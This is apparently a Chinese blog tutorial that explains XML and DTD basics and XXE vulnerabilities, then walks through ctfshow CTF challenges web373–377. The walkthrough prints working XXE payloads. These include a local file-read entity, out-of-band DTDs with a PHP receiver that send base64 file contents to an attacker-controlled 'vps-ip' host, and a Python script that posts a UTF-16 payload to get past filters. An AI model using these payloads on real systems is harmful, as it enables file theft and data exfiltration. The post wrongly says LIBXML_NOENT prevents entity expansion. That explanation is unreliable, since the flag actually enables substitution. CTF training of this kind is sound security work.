XXE漏洞初解

XXE漏洞初解

前置知识:XML和DTD

1.XML详解

XML 指可扩展标记语言(eXtensible Markup Language),这种标记语言是从标准通用标记语言(SGML)中简化修改出来的。它主要用到的有可扩展标记语言、可扩展样式语言(XSL)、XBRL和XPath等

1.1XML特点

  • XML 是一种很像HTML的标记语言

    XML和HTML的差别:

    • XML 被设计用来传输和存储数据,其焦点是数据的内容
    • HTML 被设计用来显示数据,其焦点是数据的外观

    简单来说,HTML 旨在显示信息,而 XML 旨在传输信息

  • XML 的设计宗旨是传输数据,而不是显示数据

  • XML 标签没有被预定义,需要自行定义标签

  • XML 被设计为具有自我描述性

  • XML 是 W3C 的推荐标准

1.2XML结构

XML将数据组织成为一棵树,DOM 通过解析 XML 文档,为 XML 文档在逻辑上建立一个树模型,树的节点是一个个的对象。这样通过操作这棵树和这些对象就可以完成对 XML 文档的操作,为处理文档的所有方面提供了一个完美的概念性框架

e.g.
在这里插入图片描述

上图可表示为下面XML的结构:

<bookstore>
    <book category="COOKING">
        <title lang="en">Everyday Italian</title>
        <author>Giada De Laurentiis</author>
        <year>2005</year>
        <price>30.00</price>
    </book>
    <book category="CHILDREN">
        <title lang="en">Harry Potter</title>
        <author>J K. Rowling</author>
        <year>2005</year>
        <price>29.99</price>
    </book>
    <book category="WEB">
        <title lang="en">Learning XML</title>
        <author>Erik T. Ray</author>
        <year>2003</year>
        <price>39.95</price>
    </book>
</bookstore>

1.3XML语法

1.3.1声明

XML 声明文件的可选部分,如果存在需要放在文档的第一行,如下所示:

<?xml version="1.0" encoding="utf-8"?>

以上实例包含 XML 版本(version=“1.0”),以及字符编码(encoding=“utf-8”)

1.3.2标签属性

元素可以包含属性,属性提供有关元素的附加信息

属性位于开始标签中,例如:

<person age="30" gender="male">John Doe</person>

注意在 XML 中,XML 的属性值必须加引号(单引号和双引号均可使用)

1.3.3大小写敏感

XML 标签对大小写敏感。标签 <Letter> 与标签 <letter> 是不同的。

必须使用相同的大小写来编写打开标签和关闭标签:

<Message>这是错误的</message>
<message>这是正确的</message>
1.3.4实体引用

在 XML 中,一些字符拥有特殊的意义

如果把字符 “<” 放在 XML 元素中,会发生错误,这是因为解析器会把它当作新元素的开始

这样会产生 XML 错误:

<message>if salary < 1000 then</message>

为了避免这个错误,使用用实体引用来代替 “<” 字符:

<message>if salary &lt; 1000 then</message>

在 XML 中,有 5 个预定义的实体引用:
在这里插入图片描述

1.3.5注释

在 XML 中编写注释的语法与 HTML 的语法很相似。

<!-- This is a comment -->

1.4XML元素

XML 元素指的是从(且包括)开始标签直到(且包括)结束标签的部分

一个元素可以包含:其他元素、文本、属性、或混合以上所有…

值得注意的是元素的命名规则:

  • 名称可以包含字母、数字以及其他的字符
  • 名称不能以数字或者标点符号开始
  • 名称不能以字母 xml(或者 XML、Xml 等等)开始
  • 名称不能包含空格

2.DTD详解

DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块,它使用一系列合法的元素来定义文档的结构

DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用

2.1DTD声明

2.1.1内部DOCTYPE声明

假如 DTD 被包含在 XML 源文件中,它应当通过下面的语法包装在一个 DOCTYPE 声明中:

<!DOCTYPE root-element [element-declarations]>

e.g.

<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend</body>
</note>
  • <!DOCTYPE note [:这是一个DOCTYPE声明,标识文档类型为"note"。
  • <!ELEMENT note (to,from,heading,body)>:定义了元素"note",它包含了"to"、“from”、"heading"和"body"这四个子元素。
  • <!ELEMENT to (#PCDATA)>:定义了元素"to",它的内容类型为文本数据(Parsed Character Data,即PCDATA)。
  • <!ELEMENT from (#PCDATA)>:定义了元素"from",它的内容类型为文本数据。
  • <!ELEMENT heading (#PCDATA)>:定义了元素"heading",它的内容类型为文本数据。
  • <!ELEMENT body (#PCDATA)>:定义了元素"body",它的内容类型为文本数据。

总结起来,以上DTD部分定义了一个名为"note"的元素,它包含了"to"、“from”、"heading"和"body"这四个子元素,而这四个子元素的内容都是文本数据

2.1.2外部文档声明

假如 DTD 位于 XML 源文件的外部,那么它应通过下面的语法被封装在一个 DOCTYPE 定义中:

<!DOCTYPE root-element SYSTEM "filename">

e.g.

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
</note>

这是包含 DTD 的 “note.dtd” 文件:

<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>

2.2DTD元素

在一个 DTD 中,元素通过元素声明来进行声明,元素声明使用下面的语法:

<!ELEMENT element-name category>
或
<!ELEMENT element-name (element-content)>

2.3DTD属性

在 DTD 中,属性通过 ATTLIST 声明来进行声明,属性声明使用下列语法:

<!ATTLIST element-name attribute-name attribute-type attribute-value>

以下是 属性类型的选项:

类型描述
CDATA值为字符数据 (character data)
(en1|en2|…)此值是枚举列表中的一个值
ID值为唯一的 id
IDREF值为另外一个元素的 id
IDREFS值为其他 id 的列表
NMTOKEN值为合法的 XML 名称
NMTOKENS值为合法的 XML 名称的列表
ENTITY值是一个实体
ENTITIES值是一个实体列表
NOTATION此值是符号的名称
xml:值是一个预定义的 XML 值

默认属性值可使用下列值 :

解释
属性的默认值
#REQUIRED属性值是必需的
#IMPLIED属性不是必需的
#FIXED value属性值是固定的

3.XXE漏洞

3.1什么是XXE漏洞

XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互

在某些情况下,攻击者可以利用 XXE 漏洞联合执行服务器端请求伪造(SSRF) 攻击,从而提高 XXE 攻击等级以破坏底层服务器或其他后端基础设施

XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害

XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件

3.2XXE漏洞危害

  • 敏感数据泄露:

    XXE攻击可以使攻击者读取服务器上的文件,包括配置文件、源代码、密码文件等,从而泄露敏感信息

  • 内部系统扫描:

    攻击者可以利用XXE攻击探测内部网络,识别内部服务和应用,从而为进一步的攻击提供信息

  • 服务器端请求伪造(SSRF):

    通过XXE攻击,攻击者可能能够迫使服务器与内部系统或外部服务器进行交互,可能导致数据泄露或其他安全问题

  • 执行远程代码和命令:

    在某些情况下,特别是当解析器支持强大的功能时,XXE攻击可以用于执行远程代码或系统命令,从而完全控制受影响的服务器

  • 拒绝服务攻击(DoS):

    XXE攻击可以用于发起拒绝服务攻击,例如通过指向大量消耗资源的外部实体或构造庞大的XML文档来耗尽服务器资源

  • 绕过防火墙:

    攻击者可以利用XXE漏洞绕过直接从外部网络访问内部网络资源的限制

  • 植入恶意内容:

    在某些情况下,XXE漏洞可以被用来植入恶意内容到系统中,影响数据的完整性

3.3XXE漏洞的防御策略

  • 禁用外部实体:在解析XML时禁用外部实体的处理
  • 限制XML解析器功能:配置XML解析器,以最小化处理不必要功能,例如禁用DTD(文档类型定义)
  • 输入验证:对输入的XML数据进行严格的验证,确保没有恶意构造的内容
  • 错误处理:确保错误处理机制不会泄露敏感信息

4.ctfshow靶场实战

4.1web373

进入题目后首先对代码进行分析:

  • 首先代码中使用了一个libxml_disable_entity_loader()函数用于设置libxml解析器的实体加载设置,以控制是否允许加载外部实体,题目中该函数的值为false,表示允许加载外部实体,这就给了我们实体注入的可能

  • 接下来使用了 d o m − > l o a d X M L ( dom->loadXML( dom>loadXML(xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD)是DOMDocument类的方法调用,用于加载XML文件到DOM文档对象,该方法有两个参数:$xmlfile和选项参数,这道题中的选项参数分别是LIBXML_NOENT和LIBXML_DTDLOAD:

    • LIBXML_NOENT常量指示解析器不要展开实体引用。这个选项用于防止实体注入攻击,因为实体引用可以用来在XML中插入恶意内容。禁用实体引用展开可以防止解析器加载外部实体

    • LIBXML_DTDLOAD常量指示解析器加载DTD(文档类型定义)。DTD定义了XML文档的结构和规则。加载DTD可以用于验证XML文档的有效性和完整性

      而在该方法中也有其他的选项参数:

      • LIBXML_DTDVALID: 指示解析器对DTD进行验证。如果DTD验证失败,解析过程将中止
      • LIBXML_NOBLANKS: 指示解析器在加载XML时去除空白节点
      • LIBXML_NOCDATA: 指示解析器不要将CDATA节点解释为文本节点
      • LIBXML_NOWARNING: 指示解析器不显示警告信息
      • LIBXML_NOERROR: 指示解析器不显示错误信息
      • LIBXML_COMPACT: 指示解析器以紧凑的格式加载XML,去除不必要的空白字符
      • LIBXML_HTML_NOIMPLIED: 指示解析器不要自动添加缺失的HTML元素
      • LIBXML_HTML_NODEFDTD: 指示解析器不要使用默认的DTD

      这些选项参数可以使用位运算符 | 进行组合,以同时应用多个选项,通过使用不同的选项参数,可以控制解析器的行为,确保加载和处理XML的过程符合预期

  • 最后代码使用了simplexml_import_dom()是一个PHP函数,用于将DOM文档对象转换为SimpleXMLElement对象,可以用一种简单的方式来访问和操作XML文档中的元素和属性

构建payload:

<?xml version="1.0"?>
<!DOCTYPE payload [
<!ELEMENT payload ANY>
<!ENTITY xxe SYSTEM "file:///flag">
]>
<creds>
<ctfshow>&xxe;</ctfshow>
</creds>

使用bp抓包,发送

成功读取到flag

4.2web374

依旧是对代码进行分析;

这道题的代码遇上一题大体上一致,但是少了几行代码:

c r e d s = s i m p l e x m l i m p o r t d o m ( creds = simplexml_import_dom( creds=simplexmlimportdom(dom); $ctfshow = $creds->ctfshow; echo $ctfshow;

也就导致了这题可以注入实体但是没有回显,所以我们要把读取到的内容也就是flag传到远程服务器查看

首先要在阿里云服务器上租赁一个服务器,并且安装centOS7.6的操作程序,详情可参考文章

接下来使用xshell连接到服务器后,在服务器部署docker和docker hub

利用xshell安装宝塔面板并连接服务器,参考文章

接下来在服务器上创建一个1.php

<?php 
file_put_contents("test.txt", $_GET['file']) ; 
?>

再创建xxe.xml

<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://<vps-ip>/1.php?file=%file;'> ">
%dtd;
%xxe;

bp抓包,然后输入

<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://<vps-ip>/xxe.xml">
%aaa;
]>
<root>123</root>		

将两个外部实体(%file和%aaa)引入XML文档中

回到服务器上,发现多了一个base64编码test.txt,解码后就是flag

4.3web375

比上一题多了xml,version=1或0过滤

构建payload:

<!DOCTYPE hacker[
    <!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY  % myurl SYSTEM "http://vps-ip/test.dtd">

    %myurl;
]> 

<root>
1
</root>

4.4web376

比上一题多了大小写过滤

构建payload:

<?xml version='1.0' encoding="UTF-8"?>

<!DOCTYPE hacker[
    <!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY  % myurl SYSTEM "http://vps-ip/test.dtd">

    %myurl;
]> 

<root>
1
</root>

4.5web377

比上一题多了http过滤,我们用脚本把web374的payload转为utf-16编码

构建payload:

import requests

url = 'http://a83196d0-7399-4a44-9601-23509c34a124.challenge.ctf.show/'

#注意这里是单引号,为了绕过过滤
payload = """<?xml version='1.0' encoding="UTF-8"?>
<!DOCTYPE hacker[
    <!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY  % myurl SYSTEM "http://vps-ip/test.dtd">

    %myurl;
]> 

<root>
1
</root>
"""
payload = payload.encode('utf-16')
print(requests.post(url ,data=payload).text)
  • 14
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值